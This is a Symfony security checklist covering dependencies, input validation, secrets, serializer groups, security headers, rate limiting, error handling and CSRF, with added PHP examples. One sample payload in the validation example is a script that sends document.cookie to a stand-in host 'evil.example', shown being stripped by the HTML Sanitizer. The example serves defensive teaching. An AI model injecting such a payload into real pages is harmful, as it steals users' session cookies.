
Security checklist (Symfony)

Refs:

  • https://blog.arcjet.com/next-js-security-checklist/
  • https://nextjs.org/blog/security-nextjs-server-components-actions
  • https://github.com/PHPCreation/phpreaction-frontend-crud-react-v2/issues/256

This checklist is a collection of security best practices for Symfony applications, adapted from the Next.js checklists referenced above. It covers the following topics:

  • Dependency management
  • Data validation and sanitization (user input, search parameters, XSS)
  • Environment variables and secrets
  • Accidental data exposure
  • Security headers (including Content Security Policy)
  • Controller and API hardening
  • Centralized security functions
  • Error handling
  • Development and security tools
  • Cross-Site Request Forgery (CSRF) protection

By following these guidelines, you can enhance the security of your Symfony projects and protect them from common vulnerabilities.

1. Keep Dependencies Updated

  • A. Regularly update all dependencies to their latest versions.
  • B. Use tools like Dependabot , composer outdated, or composer audit to automate updates and check for known vulnerabilities; composer audit queries the Packagist security advisory database, so run it in CI and fail the build on any finding.
  • C. Use composer recipes (Symfony Flex) to see which bundle recipes are outdated, and composer recipes:update to apply the updated bundle configuration.
  • D. Identify and remove unused or outdated dependencies to shrink the attack surface, for example with composer-unused .
  • E. Commit composer.lock and symfony.lock so every environment installs exactly the versions you audited.

2. Validate and Sanitize Data

  • A. Never trust user input; validate data from users and external APIs before acting on it.
  • B. Express validation rules once, on value objects or request DTOs annotated with Symfony Validator constraints (bound in controllers with #[MapRequestPayload]), rather than as ad-hoc checks spread across controllers.
  • C. Ensure validation covers all input cases, including edge cases: empty values, maximum lengths, unexpected types, extra or missing fields.
  • D. Verify error messages give the user clear feedback without echoing sensitive values or internal details.
  • E. Use the Symfony HTML Sanitizer  for user-supplied HTML and the Form component's constraints for form inputs; escape output for its context (Twig auto-escapes HTML) instead of trying to "clean" input for every possible sink.
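
As an added example (not code from the original page), the script below validates a hypothetical "create comment" value object with Symfony Validator constraints and then runs the user-supplied HTML through the Symfony HTML Sanitizer. It assumes `composer require symfony/validator symfony/html-sanitizer` on Symfony 6.4 or later; the class name, field names and the sample payload are constructed for the example.

```php
<?php
// Added example: validate a request value object, then sanitize its HTML field.
// Assumes symfony/validator and symfony/html-sanitizer (6.4+) installed via Composer.
declare(strict_types=1);

require __DIR__.'/vendor/autoload.php';

use Symfony\Component\HtmlSanitizer\HtmlSanitizer;
use Symfony\Component\HtmlSanitizer\HtmlSanitizerConfig;
use Symfony\Component\Validator\Constraints as Assert;
use Symfony\Component\Validator\Validation;

// Hypothetical value object. The rules live on the object, so every entry point
// (controller, console command, message handler) validates the same way.
final class CreateCommentInput
{
    public function __construct(
        #[Assert\NotBlank]
        #[Assert\Email]
        public readonly string $authorEmail,

        #[Assert\NotBlank]
        #[Assert\Length(min: 1, max: 2000)]
        public readonly string $body,

        #[Assert\Positive]
        public readonly int $postId,
    ) {}
}

$validator = Validation::createValidatorBuilder()
    ->enableAttributeMapping()   // read the #[Assert\...] attributes above
    ->getValidator();

// Allow-list configuration: only known-safe elements, only https links, and a
// forced rel on anchors. Everything not allowed (script, iframe, on* handlers,
// javascript: URLs) is removed.
$sanitizer = new HtmlSanitizer(
    (new HtmlSanitizerConfig())
        ->allowSafeElements()
        ->allowLinkSchemes(['https'])
        ->forceAttribute('a', 'rel', 'noopener noreferrer')
        ->withMaxInputLength(20_000)
);

// Constructed sample payload, shaped like what a hostile client would send.
$payload = [
    'authorEmail' => 'mallory@example.com',
    'body'        => '<p>Nice post</p><script>fetch("https://evil.example/?c="+document.cookie)</script>'
                    .'<a href="javascript:alert(1)">click</a>',
    'postId'      => 42,
];

$input = new CreateCommentInput(
    (string) ($payload['authorEmail'] ?? ''),
    (string) ($payload['body'] ?? ''),
    (int) ($payload['postId'] ?? 0),
);

$violations = $validator->validate($input);
if (count($violations) > 0) {
    foreach ($violations as $violation) {
        // Field path plus the constraint's generic message is enough feedback;
        // do not echo the rejected value back, it may be sensitive or hostile.
        echo $violation->getPropertyPath().': '.$violation->getMessage().PHP_EOL;
    }
    exit(1);
}

// Sanitize the HTML once, on the way into storage, and still escape on output.
$cleanBody = $sanitizer->sanitize($input->body);
echo $cleanBody, PHP_EOL;
```

Run it with `php validate.php`: the validator passes (the e-mail and body are well-formed, the id is positive), the `<script>` element is dropped by the sanitizer and the `javascript:` link loses its href. Change `postId` to `0` or blank the body to see the violation messages instead.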

3. Secure Environment Variables

  • A. Store sensitive information like API keys and database credentials in environment variables or the Symfony secrets vault, never in code or committed configuration.
  • B. Use a secret scanner in CI and as a pre-commit hook to catch accidental exposure of secrets in your codebase.
  • C. Ensure environment variables never reach the client: don't pass %env()% values into templates or JavaScript, and never deploy with APP_DEBUG=1 or the profiler reachable in production.
  • D. Commit only .env with placeholder defaults; keep real values in the untracked .env.local, in deployment secrets, or encrypted with bin/console secrets:set (the decryption key generated by secrets:generate-keys stays out of the repository).

4. Prevent Accidental Data Exposure

  • A. Ensure server-side logic and sensitive code are never exposed to the client.
  • B. Don't return Doctrine entities or other internal objects straight from controllers; map them to DTOs or use serializer groups so only the intended fields are serialized.
  • C. Regularly audit your API responses and the browser Network tab to catch unintentional leaks (password hashes, tokens, internal ids, other users' data).
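
The following is an added example (not from the original page) of the serializer-groups approach to point B: a hypothetical `User` class whose public and admin views are explicit allow-lists, with the password hash excluded unconditionally. It assumes `composer require symfony/serializer symfony/property-access` on Symfony 6.4 or later (the `Attribute` namespace and `AttributeLoader` appeared in 6.4); the class, field names and sample record are constructed.

```php
<?php
// Added example: expose only allow-listed fields with Symfony Serializer groups.
// Assumes symfony/serializer and symfony/property-access (6.4+).
declare(strict_types=1);

require __DIR__.'/vendor/autoload.php';

use Symfony\Component\Serializer\Attribute\Groups;
use Symfony\Component\Serializer\Attribute\Ignore;
use Symfony\Component\Serializer\Encoder\JsonEncoder;
use Symfony\Component\Serializer\Mapping\Factory\ClassMetadataFactory;
use Symfony\Component\Serializer\Mapping\Loader\AttributeLoader;
use Symfony\Component\Serializer\Normalizer\ObjectNormalizer;
use Symfony\Component\Serializer\Serializer;

// Hypothetical user record. Fields are opt-in per group; a field with no
// matching group, or marked #[Ignore], never leaves the server.
final class User
{
    public function __construct(
        #[Groups(['user:read'])]
        public int $id,
        #[Groups(['user:read'])]
        public string $displayName,
        #[Groups(['user:admin'])]   // only for admin views
        public string $email,
        #[Ignore]                   // never serialized, whatever the group
        public string $passwordHash,
        public string $resetToken,  // no group: absent whenever groups are requested
    ) {}
}

function buildSerializer(): Serializer
{
    $metadata = new ClassMetadataFactory(new AttributeLoader());

    return new Serializer([new ObjectNormalizer($metadata)], [new JsonEncoder()]);
}

// Guard against the classic mistake of serializing with no groups at all,
// which would include resetToken.
function serializeForApi(Serializer $serializer, object $object, array $groups): string
{
    if ($groups === []) {
        throw new \LogicException('Refusing to serialize without an explicit groups list.');
    }

    return $serializer->serialize($object, 'json', ['groups' => $groups]);
}

// Constructed sample record.
$user = new User(7, 'alice', 'alice@example.com', '$2y$13$constructed-hash', 'tok_constructed');
$serializer = buildSerializer();

// Public view: id and displayName only.
echo serializeForApi($serializer, $user, ['user:read']), PHP_EOL;

// Admin view: adds email; passwordHash and resetToken are still absent.
echo serializeForApi($serializer, $user, ['user:read', 'user:admin']), PHP_EOL;
```

The same `groups` context works with `$this->json($user, context: ['groups' => [...]])` in an `AbstractController`, and with the `normalizationContext` of API Platform resources, so the allow-list is defined once on the class and reused everywhere.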

5. Implement Security Headers

  • A. Send HTTP security headers like Content-Security-Policy, Strict-Transport-Security, X-Frame-Options (or the CSP frame-ancestors directive), X-Content-Type-Options and Referrer-Policy.
  • B. Use NelmioSecurityBundle  to configure them in Symfony; it also supports CSP nonces and report-only mode for a safe rollout.
  • C. Review and update your security headers regularly, and verify them on the deployed site (for example with curl -I) rather than only in configuration.
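
For readers who want to see the mechanism NelmioSecurityBundle wraps, here is an added example (not from the original page or the bundle) of a response subscriber that sets the headers itself. It assumes a standard Symfony application where autoconfiguration registers event subscribers; the directive values are a conservative starting point, not a universal policy.

```php
<?php
// Added example: stamp security headers on every main response.
// Assumes symfony/http-kernel in a standard app with autoconfiguration.
declare(strict_types=1);

namespace App\EventSubscriber;

use Symfony\Component\EventDispatcher\EventSubscriberInterface;
use Symfony\Component\HttpKernel\Event\ResponseEvent;
use Symfony\Component\HttpKernel\KernelEvents;

final class SecurityHeadersSubscriber implements EventSubscriberInterface
{
    public static function getSubscribedEvents(): array
    {
        // Low priority so it runs after listeners that still modify the response.
        return [KernelEvents::RESPONSE => ['onResponse', -10]];
    }

    public function onResponse(ResponseEvent $event): void
    {
        if (!$event->isMainRequest()) {
            return; // sub-requests (fragments, ESI) share the main response's headers
        }

        $headers = $event->getResponse()->headers;

        // HSTS is only honoured over HTTPS, so only send it there. Add "preload"
        // only once the domain is actually submitted to the preload list.
        if ($event->getRequest()->isSecure()) {
            $headers->set('Strict-Transport-Security', 'max-age=31536000; includeSubDomains');
        }

        // Deny by default, then allow the minimum. frame-ancestors supersedes
        // X-Frame-Options in CSP-aware browsers; both are kept for older ones.
        $headers->set('Content-Security-Policy', implode('; ', [
            "default-src 'self'",
            "script-src 'self'",
            "style-src 'self'",
            "img-src 'self' data:",
            "object-src 'none'",
            "base-uri 'self'",
            "form-action 'self'",
            "frame-ancestors 'none'",
        ]));
        $headers->set('X-Frame-Options', 'DENY');
        $headers->set('X-Content-Type-Options', 'nosniff');
        $headers->set('Referrer-Policy', 'strict-origin-when-cross-origin');
        $headers->set('Permissions-Policy', 'camera=(), microphone=(), geolocation=()');
    }
}
```

Roll a new CSP out under the `Content-Security-Policy-Report-Only` header name first and watch the violation reports; switching the header name above to the enforcing one is the last step, and inline scripts will need nonces or hashes before that switch.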

6. Secure Controllers & API Endpoints

  • A. Validate and sanitize all incoming data for every controller action and API endpoint, including data arriving from webhooks and other services.
  • B. Implement rate limiting (the Symfony RateLimiter component, or at the reverse proxy) and bot protection to prevent abuse of login, signup, password-reset and other expensive endpoints.
  • C. Restrict state-changing actions to POST/PUT/PATCH/DELETE with methods: [...] on the route, so they cannot be triggered by a GET link, an image tag or a prefetch.
  • D. Consider a bot-protection or WAF layer in front of the application for additional protection; the Next.js checklist this page is adapted from recommends Arcjet . Check that whatever you choose integrates with a PHP backend or sits at the reverse proxy.
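
As an added example (not from the original page), the controller below combines points A to C: a POST-only route, a validated request DTO, and the Symfony RateLimiter. It assumes `composer require symfony/rate-limiter` plus the serializer and validator packages for `#[MapRequestPayload]` (Symfony 6.3+), and a hypothetical limiter named `api_write` declared in `config/packages/rate_limiter.yaml` as shown in the comment; the route, DTO and controller names are constructed, and the two classes are shown in one file only for brevity.

```php
<?php
// Added example: POST-only, validated, rate-limited API endpoint.
// Assumes symfony/rate-limiter (6.3+) and this limiter in config/packages/rate_limiter.yaml:
//   framework:
//     rate_limiter:
//       api_write: { policy: 'sliding_window', limit: 30, interval: '1 minute' }
// which makes RateLimiterFactory $apiWriteLimiter autowirable.
declare(strict_types=1);

namespace App\Controller\Api;

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Attribute\MapRequestPayload;
use Symfony\Component\RateLimiter\RateLimiterFactory;
use Symfony\Component\Routing\Attribute\Route;
use Symfony\Component\Validator\Constraints as Assert;

// Hypothetical input DTO. MapRequestPayload deserializes and validates it and
// answers 422 on its own when a constraint fails, before the action runs.
final class CreateOrderInput
{
    public function __construct(
        #[Assert\NotBlank]
        #[Assert\Length(max: 64)]
        public readonly string $sku,
        #[Assert\Positive]
        #[Assert\LessThanOrEqual(100)]
        public readonly int $quantity,
    ) {}
}

final class OrderController extends AbstractController
{
    // methods: ['POST'] makes GET/HEAD answer 405, so a link, <img> tag or
    // prefetch can never trigger the action.
    #[Route('/api/orders', name: 'api_orders_create', methods: ['POST'])]
    public function create(
        Request $request,
        #[MapRequestPayload] CreateOrderInput $input,
        RateLimiterFactory $apiWriteLimiter,
    ): JsonResponse {
        // Key the limiter on the authenticated user when there is one, else on the
        // client IP. Behind a load balancer, configure framework.trusted_proxies or
        // every client shares the proxy's bucket.
        $key = $this->getUser()?->getUserIdentifier()
            ?? $request->getClientIp()
            ?? 'anonymous';

        $limit = $apiWriteLimiter->create($key)->consume(1);

        $headers = [
            'X-RateLimit-Limit'     => (string) $limit->getLimit(),
            'X-RateLimit-Remaining' => (string) $limit->getRemainingTokens(),
        ];

        if (!$limit->isAccepted()) {
            // Retry-After is expressed in seconds from now.
            $headers['Retry-After'] = (string) max(1, $limit->getRetryAfter()->getTimestamp() - time());

            return new JsonResponse(['error' => 'Too many requests'], Response::HTTP_TOO_MANY_REQUESTS, $headers);
        }

        // ... persist the order using $input->sku and $input->quantity ...

        return new JsonResponse(['status' => 'created'], Response::HTTP_CREATED, $headers);
    }
}
```

The sliding-window policy is a good default for write endpoints; for login and password-reset forms, key the limiter on the submitted username as well as the IP so a distributed attacker cannot spread attempts across addresses.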

7. Centralize Security Functions

  • A. Consolidate authentication and authorization logic in the security bundle configuration and in voters, not in scattered role checks inside controllers and templates.
  • B. If you use a key-value store (Redis for sessions, cache, locks or rate-limiter state), configure it in one place with one connection and one key prefix per concern, rather than per feature.
  • C. Promote code reuse and simplify maintenance by enforcing a single source of truth for every security decision.

8. Improve Error Handling

  • A. Use structured error handling: let exceptions propagate to a kernel.exception listener (or Symfony's default error controller) that logs them with context, instead of catch-all try/catch blocks that swallow errors.
  • B. Review API error messages and ensure they are user-friendly while preventing data leaks.
  • C. Never expose stack traces or internal server information: keep APP_DEBUG=0 in production and make error pages and JSON error bodies generic.
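
Here is an added example (not from the original page) of point A applied to a JSON API: a `kernel.exception` subscriber that logs the full exception server-side and returns only a status code, a generic message and a correlation id. It assumes a standard Symfony app with Monolog providing `LoggerInterface`; the `/api/` prefix and the response shape are choices made for the example.

```php
<?php
// Added example: log everything, expose nothing, for /api/* exceptions.
// Assumes symfony/http-kernel with monolog-bundle (LoggerInterface autowired).
declare(strict_types=1);

namespace App\EventSubscriber;

use Psr\Log\LoggerInterface;
use Symfony\Component\DependencyInjection\Attribute\Autowire;
use Symfony\Component\EventDispatcher\EventSubscriberInterface;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\ExceptionEvent;
use Symfony\Component\HttpKernel\Exception\HttpExceptionInterface;
use Symfony\Component\HttpKernel\KernelEvents;

final class ApiExceptionSubscriber implements EventSubscriberInterface
{
    public function __construct(
        private readonly LoggerInterface $logger,
        #[Autowire('%kernel.debug%')] private readonly bool $debug,
    ) {}

    public static function getSubscribedEvents(): array
    {
        return [KernelEvents::EXCEPTION => ['onException', 10]];
    }

    public function onException(ExceptionEvent $event): void
    {
        $request = $event->getRequest();
        if ($this->debug || !str_starts_with($request->getPathInfo(), '/api/')) {
            return; // dev keeps Symfony's exception page; HTML routes keep the error controller
        }

        $e = $event->getThrowable();
        // Correlation id the client can quote in a support ticket; it is the only
        // link between the public response and the private log entry.
        $errorId = bin2hex(random_bytes(8));

        if ($e instanceof HttpExceptionInterface) {
            // Raised on purpose (NotFoundHttpException, AccessDeniedHttpException, ...):
            // the status code is meaningful and the message was written for clients.
            $status  = $e->getStatusCode();
            $message = $e->getMessage() ?: (Response::$statusTexts[$status] ?? 'Error');
            $headers = $e->getHeaders();
            $this->logger->notice('API client error', [
                'errorId' => $errorId,
                'status'  => $status,
                'path'    => $request->getPathInfo(),
            ]);
        } else {
            // Anything else is a bug or an outage: full detail to the log, none to the client.
            $status  = Response::HTTP_INTERNAL_SERVER_ERROR;
            $message = 'Internal server error';
            $headers = [];
            $this->logger->error('Unhandled exception in API', [
                'errorId'   => $errorId,
                'exception' => $e, // Monolog records class, message, file:line and trace
                'path'      => $request->getPathInfo(),
            ]);
        }

        $event->setResponse(new JsonResponse(
            ['error' => $message, 'errorId' => $errorId],
            $status,
            $headers,
        ));
    }
}
```

Note that the message of a non-HTTP exception is never forwarded: a `PDOException` message, for instance, can contain the SQL statement or the database host.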

9. Leverage Development & Security Tools

  • A. Use editor and IDE plugins to detect security vulnerabilities during development.
  • B. Incorporate linters, static analysis tools, and security scanners into your CI/CD workflow.
  • C. Stay informed about the latest security tools and integrate them as needed.

10. Cross-Site Request Forgery (CSRF) Protection

  • A. Use CSRF tokens on every state-changing request that is authenticated by a cookie or session. Symfony forms add and check a _token field automatically; hand-written forms and fetch() calls must send one and check it with isCsrfTokenValid(). APIs authenticated by a bearer token in a header are not CSRF-prone and don't need them.
  • B. If using session-based authentication, set framework.session.cookie_samesite to lax (the default in recent recipes) or strict as an additional layer; SameSite complements the token, it does not replace it.
  • C. There is no allowedOrigins setting in Symfony (that option belongs to Next.js Server Actions). The closest equivalents are framework.trusted_hosts, which rejects requests with an unexpected Host header, and an explicit origin allow-list for CORS (for example NelmioCorsBundle); CORS rules do not stop a plain cross-site form POST, so the token check in A is still required.
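
The following added example (not from the original page) shows point A for a hand-written form: the Twig snippet in the comment embeds a token bound to the item's id, and the POST-only controller action checks it before doing anything. It assumes a standard Symfony app with `symfony/security-csrf` installed (which enables `framework.csrf_protection`), Symfony 6.3+ for `getPayload()`, Doctrine's entity value resolver, and a hypothetical `App\Entity\Item`; route and template names are constructed.

```php
<?php
// Added example: CSRF-checked, POST-only delete action for a session-authenticated user.
// Assumes symfony/security-csrf, Symfony 6.3+, Doctrine ORM and a hypothetical App\Entity\Item.
declare(strict_types=1);

namespace App\Controller;

use App\Entity\Item;
use Doctrine\ORM\EntityManagerInterface;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Attribute\Route;
use Symfony\Component\Security\Http\Attribute\IsGranted;

final class ItemController extends AbstractController
{
    /*
     * templates/item/show.html.twig (constructed for this example). The token id
     * includes the item id, so a token captured for item 1 is useless for item 2:
     *
     *   <form method="post" action="{{ path('item_delete', {id: item.id}) }}">
     *       <input type="hidden" name="_token" value="{{ csrf_token('delete-item-' ~ item.id) }}">
     *       <button type="submit">Delete</button>
     *   </form>
     */
    #[Route('/items/{id}/delete', name: 'item_delete', methods: ['POST'])]
    #[IsGranted('ROLE_USER')]
    public function delete(Request $request, Item $item, EntityManagerInterface $em): Response
    {
        // Read the token from the request body only; never accept it from the
        // query string, where it would end up in logs and Referer headers.
        $token = $request->getPayload()->getString('_token');

        if (!$this->isCsrfTokenValid('delete-item-'.$item->getId(), $token)) {
            // A missing or stale token is an authorization failure (403), not a 500.
            throw $this->createAccessDeniedException('Invalid CSRF token.');
        }

        $em->remove($item);
        $em->flush();
        $this->addFlash('success', 'Item deleted.');

        return $this->redirectToRoute('item_index');
    }
}
```

For a JavaScript client on the same site, render the token into the page once (for example in a `data-` attribute) and send it in the request body or an `X-CSRF-Token` header that the controller reads instead of `_token`; the check stays the same.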

Code

Copy and paste the markdown below into a file at the root of your project to track the checklist over time.

  • Filename : SECURITY_CHECKLIST.md
  • Header of the file : Last verification : YYYY-MM-DD By : Name (update it each time the list is re-checked)
  • Code :

```markdown
# Security checklist

Last verification : YYYY-MM-DD By : Name

Ref : https://blog.arcjet.com/next-js-security-checklist/
Ref : https://nextjs.org/blog/security-nextjs-server-components-actions
Ref : https://github.com/PHPCreation/phpreaction-frontend-crud-react-v2/issues/256

## **1. Keep Dependencies Updated**

- [ ] A. Regularly update all dependencies to their latest versions.
- [ ] B. Use tools like [Dependabot](https://docs.github.com/en/code-security/dependabot), `composer outdated`, or `composer audit` to automate updates and check for known vulnerabilities; run `composer audit` in CI and fail the build on any finding.
- [ ] C. Use `composer recipes` (Symfony Flex) to see which bundle recipes are outdated, and `composer recipes:update` to apply the updated bundle configuration.
- [ ] D. Identify and remove unused or outdated dependencies to shrink the attack surface, for example with [composer-unused](https://github.com/composer-unused/composer-unused).
- [ ] E. Commit `composer.lock` and `symfony.lock` so every environment installs exactly the versions you audited.

## **2. Validate and Sanitize Data**

- [ ] A. Never trust user input; validate data from users and external APIs before acting on it.
- [ ] B. Express validation rules once, on value objects or request DTOs annotated with Symfony Validator constraints (bound in controllers with `#[MapRequestPayload]`), rather than as ad-hoc checks spread across controllers.
- [ ] C. Ensure validation covers all input cases, including edge cases: empty values, maximum lengths, unexpected types, extra or missing fields.
- [ ] D. Verify error messages give the user clear feedback without echoing sensitive values or internal details.
- [ ] E. Use the Symfony [HTML Sanitizer](https://symfony.com/doc/current/html_sanitizer.html) for user-supplied HTML and the Form component's constraints for form inputs; escape output for its context (Twig auto-escapes HTML) instead of trying to "clean" input for every possible sink.

## **3. Secure Environment Variables**

- [ ] A. Store sensitive information like API keys and database credentials in environment variables or the Symfony secrets vault, never in code or committed configuration.
- [ ] B. Use a secret scanner in CI and as a pre-commit hook to catch accidental exposure of secrets in your codebase.
- [ ] C. Ensure environment variables never reach the client: don't pass `%env()%` values into templates or JavaScript, and never deploy with `APP_DEBUG=1` or the profiler reachable in production.
- [ ] D. Commit only `.env` with placeholder defaults; keep real values in the untracked `.env.local`, in deployment secrets, or encrypted with `bin/console secrets:set` (the decryption key generated by `secrets:generate-keys` stays out of the repository).

## **4. Prevent Accidental Data Exposure**

- [ ] A. Ensure server-side logic and sensitive code are never exposed to the client.
- [ ] B. Don't return Doctrine entities or other internal objects straight from controllers; map them to DTOs or use serializer groups so only the intended fields are serialized.
- [ ] C. Regularly audit your API responses and the browser **Network tab** to catch unintentional leaks (password hashes, tokens, internal ids, other users' data).

## **5. Implement Security Headers**

- [ ] A. Send HTTP security headers like `Content-Security-Policy`, `Strict-Transport-Security`, `X-Frame-Options` (or the CSP `frame-ancestors` directive), `X-Content-Type-Options` and `Referrer-Policy`.
- [ ] B. Use [NelmioSecurityBundle](https://symfony.com/bundles/NelmioSecurityBundle/current/index.html) to configure them in Symfony; it also supports CSP nonces and report-only mode for a safe rollout.
- [ ] C. Review and update your security headers regularly, and verify them on the deployed site (for example with `curl -I`) rather than only in configuration.

## **6. Secure Controllers & API Endpoints**

- [ ] A. Validate and sanitize all incoming data for every controller action and API endpoint, including data arriving from webhooks and other services.
- [ ] B. Implement rate limiting (the Symfony RateLimiter component, or at the reverse proxy) and bot protection to prevent abuse of login, signup, password-reset and other expensive endpoints.
- [ ] C. Restrict state-changing actions to **POST**/PUT/PATCH/DELETE with `methods: [...]` on the route, so they cannot be triggered by a GET link, an image tag or a prefetch.
- [ ] D. Consider a bot-protection or WAF layer in front of the application for additional protection; the Next.js checklist this page is adapted from recommends [Arcjet](https://arcjet.com/). Check that whatever you choose integrates with a PHP backend or sits at the reverse proxy.

## **7. Centralize Security Functions**

- [ ] A. Consolidate authentication and authorization logic in the security bundle configuration and in **voters**, not in scattered role checks inside controllers and templates.
- [ ] B. If you use a **key-value store** (Redis for sessions, cache, locks or rate-limiter state), configure it in one place with one connection and one key prefix per concern, rather than per feature.
- [ ] C. Promote code reuse and simplify maintenance by enforcing a single source of truth for every security decision.

## **8. Improve Error Handling**

- [ ] A. Use structured error handling: let exceptions propagate to a `kernel.exception` listener (or Symfony's default error controller) that logs them with context, instead of catch-all try/catch blocks that swallow errors.
- [ ] B. Review API error messages and ensure they are **user-friendly** while preventing data leaks.
- [ ] C. Never expose stack traces or internal server information: keep `APP_DEBUG=0` in production and make error pages and JSON error bodies generic.

## **9. Leverage Development & Security Tools**

- [ ] A. Use editor and IDE plugins to detect security vulnerabilities during development.
- [ ] B. Incorporate **linters, static analysis tools, and security scanners** into your CI/CD workflow.
- [ ] C. Stay informed about the latest security tools and integrate them as needed.

## **10. Cross-Site Request Forgery (CSRF) Protection**

- [ ] A. Use **CSRF tokens** on every state-changing request that is authenticated by a cookie or session. Symfony forms add and check a `_token` field automatically; hand-written forms and `fetch()` calls must send one and check it with `isCsrfTokenValid()`. APIs authenticated by a bearer token in a header are not CSRF-prone and don't need them.
- [ ] B. If using session-based authentication, set `framework.session.cookie_samesite` to `lax` (the default in recent recipes) or `strict` as an additional layer; **SameSite cookies** complement the token, they do not replace it.
- [ ] C. There is no `allowedOrigins` setting in Symfony (that option belongs to Next.js Server Actions). The closest equivalents are `framework.trusted_hosts`, which rejects requests with an unexpected `Host` header, and an explicit origin allow-list for CORS (for example NelmioCorsBundle); CORS rules do not stop a plain cross-site form POST, so the token check in A is still required.
```